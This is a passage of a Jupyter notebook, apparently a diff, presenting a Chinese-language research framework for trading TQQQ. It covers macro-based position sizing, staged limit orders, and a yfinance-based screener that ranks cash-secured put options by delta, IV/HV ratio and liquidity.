D6WKiu+g88MADZtvKlSvNHXvneWN33323LFu2LPj83XffNcdrXIj189A7YvoO9UcffSQPP/xwu/w/x4tYx+7YY49t9tz0uTjHb3w+uvuQ37Vn7Jx4BAKB4OufeOIJGTNmjOm6pbtmtaXcwZ6YtVZ+/czLcXNQx3kzdtRx3oid7kmgXXXVVfKHP/zBPH7wwQfl3HPPNT0XFixYQB0X5zFbaWkdR+KNMPfff7/pRqUL25lnnmm26bvtehxUqMLCwrDuH/qulV5eQBcyPTbEKYQrVqwwXUJGjRoVvJjQ4530MgPPPvus3HDDDXLFFVcEP0d/pj6e/vzGx+vfv3/wuS5s+rN0NxV4J3Yt0d3t9JeoPr4zXlF/pv4S12OK/Ky9Y6c1vtDT3bN0DHQF19ZyB3ti1lr5DR035ydej5uDOs6bsWsJdVz0Yuf8Pnv37h187QknnGD+1d971HHxH7MVltZxdDVH0JNPPimvvfaaGU929tlnB7frtfM2btwY7EbljD3T2zXdNevyyy+X4447zkw4kp6eHnzd7NmzzV0rfedY/+g1+3Rh0o8HDhxoKjn9PudH3xHTnxu67p/uaqK7uTjH0/TdaN11xbnD7HdeiV1LEhISZNCgQWGx1ReX+n16bJVfuRE73XVST1ry+eefB7fpC8l9+/aZSq+t5Q72xKy18utHNsTNQR3nzdi1hDouerHTPQ/091nopHV6vL7uvaD3UcfFf8xm21rHxXpadXhn+YD+/fubNfcaryGqp/nXa1HqZQL0OnpPP/20WU7AWbdPrzH6+9//Xm3bti3sfaWlpU2Os3Tp0lan+9+xY4caNGiQOY6zbp9eNzB03b6//e1v6q677nLhN2EfL8UulF5eovFSK8uXLzdrOn744YdmjVO9jMT999+v/MrN2P3lL39R55xzjvk9/+c//1EXXXSRWZfzt5Q7h46rn5dasTFmh1t+441tcaOO82bsQlHHxTZ2ixYtMvtXrVql/vvf/5o1oa+77rpmz4U6Lr5jttSSOo7EG4b+o9br9kX60bZv365mzJhh1q7UFcnq1avNdv3Hr9eojPS+SF9ah1owPvnkE7P2n/5svUZgfn5+2P4rrrhCPfroo+32/28zr8WupYsS53xHjRqlsrOz1Zw5c1RFRYXyKzdjV1xcrG677TaVk5Nj1r2cPXu22fZbyp3DzxcltsbMlosSt9gWN+o478bOQR0X29jp1yxYsMAkcjr500nfr7/+2uL5UMfFb8yWWlLHBfR/Yt3qDgAAAABAvGKMNwAAAAAALiLxBgAAAADARSTeAAAAAAC4iMQbAAAAAAAXkXgDAAAAAOAiEm8AAAAAAFxE4g0AAAAAgItIvAEAAAAAcBGJNwAAAAAALiLxBgAAAADARSTeAAAAAAC4iMQbAAAAAABxz/8DypLYWewPwdIAAAAASUVORK5CYII=", + "text/plain": [ + "
" + ] + }, + "metadata": {}, + "output_type": "display_data" + } + ], + "source": [ + "fig, ax = plt.subplots(figsize=(12, 4))\n", + "ax.plot(decision_df.index, decision_df[\"dev_ma20_pct\"], label=\"Deviation vs MA20 (%)\", color=\"#8b5cf6\")\n", + "ax.axhline(4, linestyle=\":\", color=\"#ef4444\", label=\"high-deviation threshold\")\n", + "ax.axhline(0, linestyle=\"--\", color=\"#64748b\")\n", + "ax.set_title(\"Execution Risk Proxy: Price Extension\")\n", + "ax.legend(loc=\"upper left\")\n", + "plt.show()" + ] + }, + { + "cell_type": "markdown", + "id": "7d453432", + "metadata": {}, + "source": [ + "## 5) 风控层:给出当日建议仓位\n", + "\n", + "### 仓位规则(研究版)\n", + "\n", + "先验前提:\n", + "\n", + "- 若基础信号不允许,仓位直接 0%\n", + "- 若有效性不足,仓位降到 0%~30%\n", + "\n", + "当可开仓时,用宏观分数决定仓位:\n", + "\n", + "- `macro_score >= 3` -> 100%\n", + "- `macro_score in [1,2]` -> 70%\n", + "- `macro_score in [-1,0]` -> 50%\n", + "- `macro_score <= -2` -> 0%\n", + "\n", + "最后再叠加执行层调整:\n", + "\n", + "- `SELL_PUT` 模式:权益现货仓位减半(其余转等待接盘/现金)" + ] + }, + { + "cell_type": "code", + "execution_count": 12, + "id": "b453e07f", + "metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "{'base_signal': 'LONG_ALLOWED',\n", + " 'valid_signal': 'PASS',\n", + " 'macro_score': 3.0,\n", + " 'execution_mode': 'SELL_PUT',\n", + " 'suggested_tqqq_position': '50%'}" + ] + }, + "execution_count": null, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "def position_from_macro(score: float) -> float:\n", + " if score >= 3:\n", + " return 1.0\n", + " if score >= 1:\n", + " return 0.7\n", + " if score >= -1:\n", + " return 0.5\n", + " return 0.0\n", + "\n", + "if not base_ok:\n", + " target_pos = 0.0\n", + "elif not valid_ok:\n", + " target_pos = 0.3 if float(d[\"macro_score\"]) >= 1 else 0.0\n", + "else:\n", + " target_pos = position_from_macro(float(d[\"macro_score\"]))\n", + "\n", + "if exec_mode == \"SELL_PUT\":\n", + " target_pos = target_pos * 0.5\n", + "\n", + "conclusion = {\n", + " \"base_signal\": \"LONG_ALLOWED\" if base_ok else \"RISK_OFF\",\n", + " \"valid_signal\": \"PASS\" if valid_ok else \"FAIL\",\n", + " \"macro_score\": round(float(d[\"macro_score\"]), 2),\n", + " \"execution_mode\": exec_mode,\n", + " \"suggested_tqqq_position\": f\"{int(target_pos * 100)}%\",\n", + "}\n", + "\n", + "conclusion" + ] + }, + { + "cell_type": "markdown", + "id": "037d643a", + "metadata": {}, + "source": [ + "## 6) 实际执行层(实盘细化):如何下单\n", + "\n", + "这一节把“策略判断”转成“可执行订单”。\n", + "\n", + "分两条路径:\n", + "\n", + "1. `DIRECT_BUY`:直接买入 TQQQ(现货)\n", + "2. `SELL_PUT`:卖出现金担保 Put 等待更优接盘\n", + "\n", + "> 原则:执行层服务于上层信号,不反过来推翻风控层。即使执行条件再漂亮,若基础/有效性/宏观不过关,仍不应强行开仓。" + ] + }, + { + "cell_type": "markdown", + "id": "3bfc373e", + "metadata": {}, + "source": [ + "### 6.1 DIRECT_BUY:挂什么价位的单(结构化)\n", + "\n", + "#### A. 下单方式\n", + "\n", + "优先级建议:\n", + "\n", + "1. **限价单(Limit)**,避免市价滑点\n", + "2. 分批挂单,不一次性打满\n", + "3. 首批小单试探,确认成交与波动后再加\n", + "\n", + "#### B. 价格锚点(建议)\n", + "\n", + "用 3 个锚点组合定价:\n", + "\n", + "- `P0`:当前价格\n", + "- `VWAP`:当日成交量加权均价(盘中执行时)\n", + "- `MA20`:短周期均线(偏离度判断)\n", + "\n", + "可用简化挂单带:\n", + "\n", + "- 第一笔:`min(P0, VWAP) * (1 - 0.1% ~ 0.3%)`\n", + "- 第二笔:`MA20` 附近(若价格回踩)\n", + "- 第三笔:仅在信号持续且宏观不恶化时触发\n", + "\n", + "#### C. 分批仓位模板\n", + "\n", + "- 首笔 30%\n", + "- 二笔 30%\n", + "- 三笔 40%\n", + "\n", + "触发逻辑:\n", + "\n", + "- 首笔:信号当天且市场未急剧恶化\n", + "- 二笔:回踩不破关键位或次日继续确认\n", + "- 三笔:有效性评分维持 + 宏观分数不下降\n", + "\n", + "#### D. 取消/暂停条件\n", + "\n", + "以下任一触发,当天不再追单:\n", + "\n", + "- 价格短时急拉(远离 VWAP/MA20)\n", + "- 宏观突发逆转(如利率/美元快速上冲)\n", + "- 大盘波动急剧上升(VXN/IV跳升)\n" + ] + }, + { + "cell_type": "markdown", + "id": "83e23a91", + "metadata": {}, + "source": [ + "### 6.2 SELL_PUT:期权执行框架(详细)\n", + "\n", + "Sell Put 不是“随便卖一个 Put”,核心是:\n", + "\n", + "- 你愿意在该行权价接货\n", + "- 权利金与尾部风险匹配\n", + "- 流动性足够,能进能出\n", + "\n", + "#### A. 到期日(DTE)建议\n", + "\n", + "优先:`20-45 DTE`(常用甜区)\n", + "\n", + "- 太短(<14 DTE):Gamma 风险高,波动冲击大\n", + "- 太长(>60 DTE):资金占用久,年化效率下降\n", + "\n", + "#### B. 行权价与 Delta\n", + "\n", + "优先卖 OTM Put:\n", + "\n", + "- 目标 Delta:`0.20 ~ 0.35`\n", + " - Delta 太高(>0.40):接货概率高,防守不足\n", + " - Delta 太低(<0.15):权利金可能太薄,不划算\n", + "\n", + "#### C. Gamma 风险\n", + "\n", + "- 优先低 Gamma 合约(尤其在临近到期时)\n", + "- 若 Gamma 偏高,需降低仓位或延长 DTE\n", + "\n", + "#### D. PCR(Put/Call Ratio)\n", + "\n", + "- 作为情绪过滤,不单独做交易触发\n", + "- 可用阈值示例:\n", + " - PCR 过高:市场恐慌,需提高安全边际\n", + " - PCR 过低:过度乐观,警惕回撤\n", + "\n", + "#### E. IV vs HV\n", + "\n", + "这是 Sell Put 的核心定价逻辑:\n", + "\n", + "- 当 `IV / HV` 足够高(例如 > 1.1~1.3)时,卖方定价更有优势\n", + "- 当 IV 太低(接近或低于 HV)时,常见问题:\n", + " - 权利金太少\n", + " - 赔付尾部风险不变\n", + " - 风险收益比失衡\n", + "\n", + "**结论**:IV 太低时宁可等待,不为“有单可下”而下单。\n", + "\n", + "#### F. 成交量与持仓量(Liquidity)\n", + "\n", + "最低流动性建议(示例):\n", + "\n", + "- 单腿日成交量 >= 100\n", + "- 持仓量 OI >= 500\n", + "- Bid-Ask 相对价差 <= 10%\n", + "\n", + "不满足则谨慎:流动性差时,进场和止损成本都会变高。\n" + ] + }, + { + "cell_type": "code", + "execution_count": 13, + "id": "4240a7b0", + "metadata": {}, + "outputs": [ + { + "data": { + "text/html": [ + "
\n", + "\n", + "\n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + " \n", + "
expirydtestrikemidivhv20iv_hv_ratiodeltagammavolumeoispread_pctotm_pctscore
1242026-05-153143.01.4700.6948270.7002830.992210-0.2123400.029040429.01894.00.0544220.1283200.721743
252026-05-011744.01.0950.7197290.7002831.027770-0.2040340.036977424.0579.00.0091320.1080480.721645
1262026-05-153145.01.9050.6508820.7002830.929457-0.2744810.035626836.03620.00.0367450.0877760.700731
272026-05-011745.01.2700.6870150.7002830.981054-0.2395050.0424564761.01106.00.0629920.0877760.698582
832026-05-082445.01.6000.6645540.7002830.948980-0.2605390.038628226.0696.00.0875000.0877760.667944
1272026-05-153146.02.2150.6386750.7002830.912025-0.3123870.038551114.0516.00.0677200.0675050.640029
\n", + "
" + ], + "text/plain": [ + " expiry dte strike mid iv hv20 iv_hv_ratio \\\n", + "124 2026-05-15 31 43.0 1.470 0.694827 0.700283 0.992210 \n", + "25 2026-05-01 17 44.0 1.095 0.719729 0.700283 1.027770 \n", + "126 2026-05-15 31 45.0 1.905 0.650882 0.700283 0.929457 \n", + "27 2026-05-01 17 45.0 1.270 0.687015 0.700283 0.981054 \n", + "83 2026-05-08 24 45.0 1.600 0.664554 0.700283 0.948980 \n", + "127 2026-05-15 31 46.0 2.215 0.638675 0.700283 0.912025 \n", + "\n", + " delta gamma volume oi spread_pct otm_pct score \n", + "124 -0.212340 0.029040 429.0 1894.0 0.054422 0.128320 0.721743 \n", + "25 -0.204034 0.036977 424.0 579.0 0.009132 0.108048 0.721645 \n", + "126 -0.274481 0.035626 836.0 3620.0 0.036745 0.087776 0.700731 \n", + "27 -0.239505 0.042456 4761.0 1106.0 0.062992 0.087776 0.698582 \n", + "83 -0.260539 0.038628 226.0 696.0 0.087500 0.087776 0.667944 \n", + "127 -0.312387 0.038551 114.0 516.0 0.067720 0.067505 0.640029 " + ] + }, + "execution_count": null, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "# SELL_PUT 候选筛选器(代码骨架)\n", + "# 说明:yfinance 的期权希腊值并不完整,若 delta/gamma 缺失,这里会使用近似或标记为 NaN。\n", + "\n", + "import math\n", + "from scipy.stats import norm\n", + "\n", + "\n", + "def bs_put_delta_gamma(S, K, T, r, sigma):\n", + " if S <= 0 or K <= 0 or T <= 0 or sigma <= 0:\n", + " return np.nan, np.nan\n", + " d1 = (math.log(S / K) + (r + 0.5 * sigma**2) * T) / (sigma * math.sqrt(T))\n", + " delta = norm.cdf(d1) - 1\n", + " gamma = norm.pdf(d1) / (S * sigma * math.sqrt(T))\n", + " return delta, gamma\n", + "\n", + "\n", + "def pick_put_candidates(ticker=\"TQQQ\", rf=0.045):\n", + " tk = yf.Ticker(ticker)\n", + " expiries = tk.options\n", + " if not expiries:\n", + " return pd.DataFrame()\n", + "\n", + " spot = float(tk.history(period=\"1d\")[\"Close\"].iloc[-1])\n", + " rows = []\n", + "\n", + " # 基于历史波动做 IV 缺失时的兜底近似\n", + " hist = tk.history(period=\"1y\")[\"Close\"]\n", + " hv20 = float(hist.pct_change().rolling(20).std().dropna().iloc[-1] * np.sqrt(252)) if len(hist) > 40 else np.nan\n", + "\n", + " for exp in expiries:\n", + " try:\n", + " chain = tk.option_chain(exp)\n", + " puts = chain.puts.copy()\n", + " except Exception:\n", + " continue\n", + "\n", + " if puts.empty:\n", + " continue\n", + "\n", + " dte = (pd.Timestamp(exp) - pd.Timestamp.today().normalize()).days\n", + " if dte < 14 or dte > 60:\n", + " continue\n", + "\n", + " puts = puts.dropna(subset=[\"strike\", \"bid\", \"ask\"])\n", + " puts[\"mid\"] = (puts[\"bid\"] + puts[\"ask\"]) / 2\n", + " puts = puts[puts[\"mid\"] > 0]\n", + "\n", + " for _, r0 in puts.iterrows():\n", + " K = float(r0[\"strike\"])\n", + " iv = float(r0[\"impliedVolatility\"]) if pd.notna(r0.get(\"impliedVolatility\", np.nan)) else np.nan\n", + " sigma = iv if pd.notna(iv) and iv > 0 else hv20\n", + " T = max(dte, 1) / 365.0\n", + "\n", + " delta, gamma = bs_put_delta_gamma(spot, K, T, rf, sigma) if pd.notna(sigma) else (np.nan, np.nan)\n", + " spread_pct = (float(r0[\"ask\"]) - float(r0[\"bid\"])) / max(float(r0[\"mid\"]), 1e-6)\n", + "\n", + " rows.append(\n", + " {\n", + " \"expiry\": exp,\n", + " \"dte\": dte,\n", + " \"strike\": K,\n", + " \"mid\": float(r0[\"mid\"]),\n", + " \"iv\": iv,\n", + " \"hv20\": hv20,\n", + " \"iv_hv_ratio\": (iv / hv20) if pd.notna(iv) and pd.notna(hv20) and hv20 > 0 else np.nan,\n", + " \"delta\": delta,\n", + " \"gamma\": gamma,\n", + " \"volume\": float(r0.get(\"volume\", np.nan)) if pd.notna(r0.get(\"volume\", np.nan)) else 0.0,\n", + " \"oi\": float(r0.get(\"openInterest\", np.nan)) if pd.notna(r0.get(\"openInterest\", np.nan)) else 0.0,\n", + " \"spread_pct\": spread_pct,\n", + " \"otm_pct\": (spot - K) / spot,\n", + " }\n", + " )\n", + "\n", + " out = pd.DataFrame(rows)\n", + " if out.empty:\n", + " return out\n", + "\n", + " # 规则过滤\n", + " out = out[(out[\"delta\"].abs() >= 0.20) & (out[\"delta\"].abs() <= 0.35)]\n", + " out = out[out[\"spread_pct\"] <= 0.10]\n", + " out = out[(out[\"volume\"] >= 100) & (out[\"oi\"] >= 500)]\n", + "\n", + " # 打分(可按需要调整权重)\n", + " out[\"score\"] = (\n", + " out[\"iv_hv_ratio\"].fillna(0) * 0.35\n", + " + (0.35 - out[\"delta\"].abs()).clip(lower=0) * 0.25\n", + " + (1 - out[\"spread_pct\"]).clip(lower=0) * 0.20\n", + " + np.log1p(out[\"oi\"]) / 10 * 0.20\n", + " )\n", + "\n", + " return out.sort_values(\"score\", ascending=False)\n", + "\n", + "\n", + "put_candidates = pick_put_candidates(\"TQQQ\")\n", + "put_candidates.head(10)" + ] + }, + { + "cell_type": "markdown", + "id": "6270e04f", + "metadata": {}, + "source": [ + "### SELL_PUT 候选筛选器说明(这段代码做了什么)\n", + "\n", + "这段代码分为 **3 步:拉数据 -> 过滤 -> 打分排序**。\n", + "\n", + "#### 1) 数据层(拉取与补全)\n", + "\n", + "- 拉取 `TQQQ` 全部可用到期日的 Put 期权链\n", + "- 只保留 `14 ~ 60 DTE` 的合约(避免太短 Gamma 风险、太长资金效率低)\n", + "- 计算中间价:`mid = (bid + ask) / 2`\n", + "- 若 `impliedVolatility` 缺失,用 `hv20`(20日历史年化波动)做近似兜底\n", + "- 用 Black-Scholes 近似计算 `delta/gamma`(当源数据无希腊值时)\n", + "\n", + "#### 2) 规则过滤(硬门槛)\n", + "\n", + "候选合约必须同时满足:\n", + "\n", + "- `|delta|` 在 `[0.20, 0.35]`\n", + " - 目标是“有权利金但不过度激进”的 OTM Put 区间\n", + "- `spread_pct <= 0.10`\n", + " - 价差不能太宽,避免进出场滑点过大\n", + "- `volume >= 100` 且 `oi >= 500`\n", + " - 保证基本流动性,降低成交与平仓风险\n", + "\n", + "#### 3) 打分公式(软排序)\n", + "\n", + "过滤后再做综合评分:\n", + "\n", + "`score = 0.35*iv_hv_ratio + 0.25*(0.35-|delta|) + 0.20*(1-spread_pct) + 0.20*log1p(oi)/10`\n", + "\n", + "含义:\n", + "\n", + "- `iv_hv_ratio`(权重 35%):\n", + " - IV 相对 HV 越高,卖方定价优势越大\n", + "- `delta 距离`(权重 25%):\n", + " - 越接近保守端(接近 0.20)越高分\n", + "- `价差质量`(权重 20%):\n", + " - `spread_pct` 越小越好\n", + "- `持仓深度`(权重 20%):\n", + " - OI 越高,流动性通常越好(用 `log1p` 防止极端值主导)\n", + "\n", + "最终按 `score` 从高到低排序,`head(10)` 输出优先候选。\n", + "\n", + "> 注意:这是研究版评分器,不等于自动交易指令。实盘前仍需人工复核:宏观状态、事件风险(财报/FOMC)、仓位上限、单笔最大亏损容忍度。" + ] + }, + { + "cell_type": "markdown", + "id": "bd40b829", + "metadata": {}, + "source": [ + "### 6.3 IV 太低时怎么决策(关键)\n", + "\n", + "这是你提到的核心难题:\n", + "\n", + "- 如果 IV 太低,卖 Put 权利金很薄\n", + "- 但尾部风险(单边下跌)并没有消失\n", + "- 风险收益比会明显变差\n", + "\n", + "建议决策顺序:\n", + "\n", + "1. 若 `iv_hv_ratio < 1.0~1.1`:\n", + " - 默认 **不卖 Put**\n", + " - 若必须建仓,倾向少量 direct buy 或等待回踩\n", + "2. 若 `iv_hv_ratio >= 1.2` 且流动性达标:\n", + " - 才考虑 sell put\n", + "3. 若宏观分数偏弱(<=0):\n", + " - 即使 IV 看起来够高,也要降仓/减频\n", + "\n", + "一句话:**低 IV 不是“安全”,而是“卖方补偿不足”。**" + ] + }, + { + "cell_type": "code", + "execution_count": 15, + "id": "a8eb83ce", + "metadata": {}, + "outputs": [ + { + "data": { + "text/plain": [ + "{'base_signal': 'LONG_ALLOWED',\n", + " 'valid_signal': 'PASS',\n", + " 'macro_score': 3.0,\n", + " 'execution_mode': 'SELL_PUT',\n", + " 'target_position': 0.5,\n", + " 'sell_put_plan': {'expiry': '2026-05-15',\n", + " 'dte': 31,\n", + " 'strike': 43.0,\n", + " 'delta_abs': 0.212,\n", + " 'iv_hv_ratio': 0.992,\n", + " 'volume': 429,\n", + " 'open_interest': 1894,\n", + " 'spread_pct': 0.0544}}" + ] + }, + "execution_count": null, + "metadata": {}, + "output_type": "execute_result" + } + ], + "source": [ + "# 最终执行建议汇总(把前面结果串起来)\n", + "summary = {}\n", + "summary[\"base_signal\"] = \"LONG_ALLOWED\" if base_ok else \"RISK_OFF\"\n", + "summary[\"valid_signal\"] = \"PASS\" if valid_ok else \"FAIL\"\n", + "summary[\"macro_score\"] = float(d[\"macro_score\"])\n", + "summary[\"execution_mode\"] = exec_mode\n", + "summary[\"target_position\"] = float(target_pos)\n", + "\n", + "if exec_mode == \"DIRECT_BUY\":\n", + " # 示例挂单建议(可按你的券商规则微调)\n", + " latest = float(decision_df[\"close\"].iloc[-1])\n", + " ma20 = float(decision_df[\"close\"].rolling(20).mean().iloc[-1])\n", + " vwap_proxy = latest # 若有分钟级数据,可替换为真实盘中 VWAP\n", + "\n", + " p1 = min(latest, vwap_proxy) * (1 - 0.002)\n", + " p2 = ma20\n", + " summary[\"direct_buy_plan\"] = {\n", + " \"batch_1_30pct_limit\": round(p1, 2),\n", + " \"batch_2_30pct_limit\": round(p2, 2),\n", + " \"batch_3_40pct\": \"仅在信号持续+宏观不恶化时执行\",\n", + " }\n", + "\n", + "elif exec_mode == \"SELL_PUT\":\n", + " if put_candidates.empty:\n", + " summary[\"sell_put_plan\"] = \"未找到满足筛选条件的候选合约,建议等待或改为小仓位 direct buy\"\n", + " else:\n", + " top = put_candidates.iloc[0]\n", + " summary[\"sell_put_plan\"] = {\n", + " \"expiry\": str(top[\"expiry\"]),\n", + " \"dte\": int(top[\"dte\"]),\n", + " \"strike\": round(float(top[\"strike\"]), 2),\n", + " \"delta_abs\": round(abs(float(top[\"delta\"])), 3),\n", + " \"iv_hv_ratio\": round(float(top[\"iv_hv_ratio\"]), 3) if pd.notna(top[\"iv_hv_ratio\"]) else None,\n", + " \"volume\": int(top[\"volume\"]),\n", + " \"open_interest\": int(top[\"oi\"]),\n", + " \"spread_pct\": round(float(top[\"spread_pct\"]), 4),\n", + " }\n", + "\n", + "summary" + ] + }, + { + "cell_type": "markdown", + "id": "e7dd46bf", + "metadata": {}, + "source": [ + "## 8) 结果可视化增强(过去 30 天)\n", + "\n", + "下面补充三类图,帮助更直观地判断当前执行环境:\n", + "\n", + "1. **IV vs HV(30 天)**:观察卖方定价优势是否成立\n", + "2. **PCR(30 天)**:观察市场情绪冷热变化\n", + "3. **成交量(30 天)**:观察流动性是否支持执行\n", + "\n", + "> 说明:免费数据源下,`QQQ` 的完整历史期权 IV 与期权成交量时间序列较难稳定获取。\n", + "> 因此这里采用“可复现口径”:\n", + "> - IV:优先使用 `VXN` 作为 QQQ 隐含波动代理(除以 100)\n", + "> - PCR:优先尝试 `^PCALL`,若不可得则给出替代提示\n", + "> - 成交量:使用 `TQQQ/QQQ` 标的成交量 30 日走势 + 当前期权链横截面" + ] + }, + { + "cell_type": "code", + "execution_count": 17, + "id": "2002fcc6", + "metadata": {}, + "outputs": [ + { + "data": { + "image/png": "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